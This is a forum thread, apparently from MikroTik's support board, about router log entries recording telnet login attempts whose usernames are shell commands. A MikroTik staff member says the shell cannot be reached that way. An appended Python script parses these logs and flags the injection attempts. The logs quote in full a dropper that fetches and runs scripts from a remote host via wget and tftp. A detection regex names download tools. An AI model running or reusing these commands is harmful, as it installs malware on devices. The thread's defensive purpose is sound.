exa
newbie
Topic Author
Posts: 37
Joined: Sat Jul 04, 2009 2:07 pm

Login security - possible username shellcode injection?

Mon Jun 13, 2016 11:52 am

Hi everyone,

we just saw this in one of our routers' logs:
system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet
system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet
Looks like someone's trying to inject malicious code via username. I wouldn't get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we'd be seriously fucked up.

Could anyone from MikroTik please reliably investigate/acknowledge/deny the possibility of this type of code injection? Version is quite recent (6.32.2). If the injection weren't possible, I highly doubt the scriptkids would even care to send such logins....

Thanks in advance,
-mk
 
mrz
MikroTik Support
Posts: 6045
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Login security - possible username shellcode injection?

Mon Jun 13, 2016 3:41 pm

Don't worry. It is not possible to access the shell in such a way.
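Added example, not written by either poster or by MikroTik: a small triage script for log lines of the form shown in the first post. It flags login failures whose username contains shell syntax and joins the usernames of consecutive failures from the same source, which shows that the second "truncated" username is the continuation of the first. The function names are hypothetical, the third log line is constructed, and the grouping rests on the assumption that consecutive failures from one source and service are pieces of one long line written at the login prompt.

```python
import re
from itertools import groupby

SAMPLE_LOG = [
    # The first two lines are copied from the first post in this thread.
    "system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet",
    "system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet",
    # Constructed line: an ordinary failed login for comparison.
    "system,error,critical login failure for user admin from 192.0.2.10 via ssh",
]

# The username is matched greedily so that a " from " inside the attacker-supplied
# text cannot end the field early; the trailing address and service anchor the match.
LINE_RE = re.compile(
    r"^(?P<topics>\S+) login failure for user (?P<user>.*) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) via (?P<svc>\w+)$"
)
# Shell metacharacters and download/permission tools that never belong in a username.
SHELL_META = re.compile(r"[;|&`$<>]|\b(?:wget|tftp|chmod|curl)\b")


def parse(line):
    """Return the fields of one login-failure line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def suspicious(user):
    """True when the supplied username looks like a shell command."""
    return bool(SHELL_META.search(user))


def reassemble(lines):
    """Join usernames of consecutive failures that share a source and service."""
    events = [e for e in map(parse, lines) if e]
    results = []
    for (src, svc), group in groupby(events, key=lambda e: (e["src"], e["svc"])):
        fragments = [e["user"] for e in group]
        payload = "".join(fragments)
        results.append({"src": src, "svc": svc, "fragments": len(fragments),
                        "payload": payload, "suspicious": suspicious(payload)})
    return results


if __name__ == "__main__":
    for r in reassemble(SAMPLE_LOG):
        print(r["src"], r["svc"], r["fragments"], r["suspicious"], repr(r["payload"]))
```

The joined payload reads `... tftp 208.67.1.91 -c get tftp1.sh; ...` across the fragment boundary, so the split on its own only shows that the submitted line was longer than one username; it does not show that any of it was executed.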
